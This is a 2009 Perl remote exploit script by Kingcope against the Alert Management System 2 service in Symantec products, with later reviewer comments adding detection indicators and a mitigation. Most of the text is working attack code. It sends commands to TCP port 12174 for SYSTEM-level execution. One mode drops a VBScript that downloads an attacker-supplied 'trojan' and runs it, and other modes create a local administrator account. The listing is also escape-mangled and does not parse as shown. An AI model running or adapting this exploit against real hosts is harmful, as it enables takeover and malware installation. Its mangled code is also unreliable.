
symantec-exec.txt

Posted on 04 February 2010

#The AMS2 (Alert Management Systems 2) component of multiple Symantec products is prone to a remote
#command-execution vulnerability because the software fails to adequately sanitize user-supplied
#input.
#Successfully exploiting this issue will allow an attacker to execute arbitrary commands with
#SYSTEM-level privileges, completely compromising affected computers. Failed exploit attempts will
#result in a denial-of-service condition.
#
###
### SYMANTEC AV w/ INTEL FILE TRANSFER SERVICE
### REMOTE SYSTEM LEVEL EXPLOIT
### USE AT YOUR OWN RISK!
### by Kingcope in 2009
###
#
# NOTE(review): this listing appears to be an escape-mangled extraction of the
# original script — several double-quoted literals below contain unescaped `"`
# and the "x00..." framing bytes look as if they have lost their backslashes — so
# the text does not parse as shown. It is kept verbatim; the comments below
# describe what the visible code does, with the network and host artefacts a
# defender can key on. No `use strict`/`use warnings`: every variable is a
# package global, so $target, $sock, $res etc. leak between subs and file scope.
use IO::Socket;

# rce($target, $cmmd): send one command line to the AMS2 listener on TCP/12174
# and print whether the service echoed the success sentinel back.
#
# Wire format as built here: four bytes (intended as NULs), a little-endian
# 16-bit length (pack "v") equal to length($cmd)+1, the command text, and one
# trailing byte (intended as NUL). The command is wrapped as
# `cmd.exe /C <cmmd> | exit <decimal of 0xc0d3b4b3>` so that the exit status of
# the spawned shell acts as a marker; 0x14 bytes of reply are read and bytes
# 0x10..0x13 are compared with pack("L", 0xc0d3b4b3).
#
# Detection notes: an unauthenticated inbound session on TCP/12174 followed by a
# cmd.exe child of the AMS2 service whose command line ends in
# `| exit <decimal of 0xc0d3b4b3>` is a high-fidelity indicator of this tool.
# Mitigation is the vendor fix for the AMS2 input-handling flaw plus blocking
# TCP/12174 from untrusted networks.
#
# Control flow quirks: a failed connect jumps via `goto lbl` to the label that
# sits after `return`, prints PORT CLOSED and exits the whole program; the
# return value of read() is never checked, so a short or empty reply simply
# makes the sentinel comparison fail and prints COMMAND FAILED.
sub rce {
    ($target, $cmmd) = @_;
    # `||` binds to the constructor call here; on failure control goes to lbl:.
    $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '12174', Proto => 'tcp') || goto lbl;
    # Decimal rendering of the sentinel; may differ between 32- and 64-bit perls.
    $magic = sprintf("%d", 0xc0d3b4b3);
    $command = "cmd.exe /C $cmmd | exit $magic";
    $cmd = "$command";
    # Length-prefixed request frame (see header comment for the layout).
    $req = "x00x00x00x00" . pack("v", length($cmd)+1) . $cmd . "x00";
    print $sock $req;
    read($sock, $res, 0x14);
    # Sentinel is expected at offset 0x10 of the reply.
    $resp = substr($res, 0x10, 4);
    if ($resp eq pack("L", 0xc0d3b4b3)) {
        print "SUCCESS! 
";
    } else {
        print "COMMAND FAILED ";
    }
    return;
    # Reached only through the goto above (connect failure).
    lbl: print "PORT CLOSED ";
    exit;
}

# usage(): print the four operating modes and exit.
#   -a   add a local user and join it to the group resolved from SID S-1-5-32-544
#        (built-in Administrators) via a dropped VBScript
#   -a2  add a local user and join it to a group given by name via `net localgroup`
#   -d   drop a VBScript that downloads a URL to c:\installer.exe and runs it
#   -t   connectivity test (echo)
sub usage {
    print "usage: perl xpl.pl [-a <target> <username> <password>] [-a2 <target> <username> <password> <administrators groupname> [-d <target> <trojan url>] [-t <target> ] ";
    print "-a IS ADDUSER WITH SID METHOD ";
    print "-a2 IS ADDUSER BY NAME ";
    print "-t IS TEST ";
    print "-d IS DOWNLOAD AND EXEC, EXE FILE MUST NOT BE DETECTABLE BY SYMANTEC AV ";
    print "Example: perl xpl.pl -a www.symantec.com r00t p455 ";
    exit;
}

# Main script: argument handling, then one block per mode. Each mode ends up in
# rce(), i.e. one or two cmd.exe invocations on the target.
print " *** Symantec AV Remote Exploit *** by Kingcope in 2009 ";
if ($#ARGV < 1) { usage(); }
$specify = $ARGV[0];
$target = $ARGV[1];
# Per-mode argument-count checks ($#ARGV is the last index, not the count).
if ($specify eq "-d" && $#ARGV != 2) { usage(); }
if ($specify eq "-a" && $#ARGV != 3) { usage(); }
if ($specify eq "-a2" && $#ARGV != 4) { usage(); }
if ($specify eq "-t" && $#ARGV != 1) { usage(); }
# Unbuffered STDOUT so progress lines appear before the sleeps.
$|=1;

# -d: the 32 `echo ... >> c:\getcreds.vbs` lines below are chained with `&&`
# into a single cmd.exe command line that writes a VBScript, then the script is
# run and (after 3 s) deleted. Host artefacts worth alerting on: creation of
# c:\getcreds.vbs and c:\installer.exe, a WinHttpRequest download from the
# given URL, and the script rewriting the User and System `Path`, `TEMP` and
# `TMP` environment values before launching c:\installer.exe.
if ($specify eq "-d") {
    $trojanurl = $ARGV[2];
    $getcred[0] = "echo Function SaveBinaryData(FileName, ByteArray) > c:\getcreds.vbs";
    $getcred[1] = "echo Const adTypeBinary = 1 >> c:\getcreds.vbs";
    $getcred[2] = "echo Const adSaveCreateOverWrite = 2 >> c:\getcreds.vbs";
    $getcred[3] = "echo Dim BinaryStream >> c:\getcreds.vbs";
    $getcred[4] = "echo Set BinaryStream = CreateObject("ADODB.Stream") >> c:\getcreds.vbs";
    $getcred[5] = "echo BinaryStream.Type = adTypeBinary >> c:\getcreds.vbs";
    $getcred[6] = "echo BinaryStream.Open >> c:\getcreds.vbs";
    $getcred[7] = "echo BinaryStream.Write ByteArray >> c:\getcreds.vbs";
    $getcred[8] = "echo BinaryStream.SaveToFile FileName, adSaveCreateOverWrite >> c:\getcreds.vbs";
    $getcred[9] = "echo End Function >> c:\getcreds.vbs";
    $getcred[10] = "echo Sub HTTPDownload( myURL, myPath ) >> c:\getcreds.vbs";
    $getcred[11] = "echo Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" ) >> c:\getcreds.vbs";
    $getcred[12] = "echo objHTTP.Open "GET", myURL, False >> c:\getcreds.vbs";
    $getcred[13] = "echo objHTTP.Send >> c:\getcreds.vbs";
    $getcred[14] = "echo SaveBinaryData myPath, objHTTP.ResponseBody >> 
c:\getcreds.vbs";
    $getcred[15] = "echo End Sub >> c:\getcreds.vbs";
    $getcred[16] = "echo HTTPDownload "$trojanurl", "c:\installer.exe" >> c:\getcreds.vbs";
    $getcred[17] = "echo Set shell = CreateObject("WScript.Shell") >> c:\getcreds.vbs";
    $getcred[18] = "echo Set objEnv = shell.Environment("Process") >> c:\getcreds.vbs";
    $getcred[19] = "echo Set objEnv2 = shell.Environment("User") >> c:\getcreds.vbs";
    $getcred[20] = "echo Set objEnv3 = shell.Environment("System") >> c:\getcreds.vbs";
    $getcred[21] = "echo sysRoot = objEnv("systemroot") >> c:\getcreds.vbs";
    $getcred[22] = "echo userProfile = objEnv("userprofile") >> c:\getcreds.vbs";
    # `^&` is the cmd.exe escape for a literal `&` inside the echoed VBScript.
    $getcred[23] = "echo objEnv2("Path") = sysRoot ^& ";" ^& sysRoot ^&"\system32;" ^& sysRoot ^& "\temp;" ^& sysRoot ^& "\wbem" >> c:\getcreds.vbs";
    $getcred[24] = "echo objEnv3("Path") = sysRoot ^& ";" ^& sysRoot ^&"\system32;" ^& sysRoot ^& "\temp;" ^& sysRoot ^& "\wbem" >> c:\getcreds.vbs";
    $getcred[25] = "echo objEnv2("TEMP") = sysRoot ^& "\temp" >> c:\getcreds.vbs";
    $getcred[26] = "echo objEnv2("TMP") = sysRoot ^& "\temp" >> c:\getcreds.vbs";
    $getcred[27] = "echo objEnv3("TEMP") = sysRoot ^& "\temp" >> c:\getcreds.vbs";
    $getcred[28] = "echo objEnv3("TMP") = sysRoot ^& "\temp" >> c:\getcreds.vbs";
    $getcred[29] = "echo shell.CurrentDirectory = "c:\" >> c:\getcreds.vbs";
    $getcred[30] = "echo shell.Run Chr(34) ^& "c:\installer.exe" ^& Chr(34), 1, false >> c:\getcreds.vbs";
    $getcred[31] = "echo Set shell = Nothing >> c:\getcreds.vbs";
    # Join all 32 echo lines into one `&&`-chained command line (a distinctive
    # process-creation artefact: one very long cmd.exe command with 31 `&&`).
    $commandx = $getcred[0];
    for ($k=1;$k<=31;$k++) { $commandx .= " && ".$getcred[$k]; }
    print "UPLOAD AND RUN KIT .. ";
    rce($target, "$commandx && c:\getcreds.vbs");
    sleep(3);
    print " ";
    print "DELETE KIT FETCHER .. ";
    rce($target, "del c:\getcreds.vbs");
    print "COMPLETED....";
}

# -a: creates a local account with `net user <name> <pass> /add`, then drops
# c:\getcred.vbs which resolves the account name behind SID S-1-5-32-544
# (built-in Administrators) through WMI and adds the new user to that group
# through the WinNT ADSI provider, then deletes the script. Expected audit
# trail on the target: a user-created event (4720) and a member-added-to-local-
# group event (4732) whose subject is the AMS2 service context, plus the
# `net user` / `net localgroup`-style process creations under cmd.exe.
if ($specify eq "-a") {
    $getcreds[0] = "echo strComputer = "." 
> c:\getcred.vbs";
    $getcreds[1] = "echo strSID = "S-1-5-32-544" >> c:\getcred.vbs";
    $getcreds[2] = "echo Set objWMIService = GetObject("winmgmts:\\" ^& strComputer ^& "\root\cimv2") >> c:\getcred.vbs";
    $getcreds[3] = "echo Set objSID = objWMIService.Get("Win32_SID='" ^& strSID ^& "'") >> c:\getcred.vbs";
    $getcreds[4] = "echo groupname=objSID.AccountName >> c:\getcred.vbs";
    $getcreds[5] = "echo Set objNetwork = WScript.CreateObject("WScript.Network") >> c:\getcred.vbs";
    $getcreds[6] = "echo Set objGroup = GetObject("WinNT://" ^& objNetwork.ComputerName ^& "/"^&groupname^&",group") >> c:\getcred.vbs";
    # The account to add is passed as the script's first argument (see the
    # rce() call below, which appends $username).
    $getcreds[7] = "echo Admin_Name = WScript.Arguments(0) >> c:\getcred.vbs";
    $getcreds[8] = "echo Path = "WinNT://" ^& objNetwork.ComputerName ^& "/" ^& Admin_Name >> c:\getcred.vbs";
    $getcreds[9] = "echo If Not objGroup.IsMember(Path) Then >> c:\getcred.vbs";
    $getcreds[10] = "echo objGroup.Add(Path) >> c:\getcred.vbs";
    $getcreds[11] = "echo End If >> c:\getcred.vbs";
    $getcreds[12] = "echo Set objGroup = Nothing >> c:\getcred.vbs";
    $getcreds[13] = "echo set objNetwork = Nothing >> c:\getcred.vbs";
    $username = $ARGV[2];
    $password = $ARGV[3];
    $commandxx = $getcreds[0];
    for ($k=1;$k<=13;$k++) { $commandxx .= " && " . $getcreds[$k]; }
    print "RUN ADD USER .. ";
    rce($target, "net user $username $password /add");
    sleep(3);
    print " ";
    print "RUN ADD TO GROUP .. ";
    rce($target, "$commandxx && c:\getcred.vbs $username && del c:\getcred.vbs");
}

# -a2: same outcome as -a but with the group named on the command line and no
# dropped file; both `net user ... /add` and `net localgroup ... /add` run in
# one cmd.exe invocation.
if ($specify eq "-a2") {
    $username = $ARGV[2];
    $password = $ARGV[3];
    $admin = $ARGV[4];
    print "RUN ADD USER .. ";
    rce($target, "net user $username $password /add && net localgroup $admin $username /add");
}

# -t: harmless probe; only the rce() sentinel round-trip is exercised.
if ($specify eq "-t") {
    print "RUN TEST $target .. ";
    rce($target, "echo ELITE .");
}

 
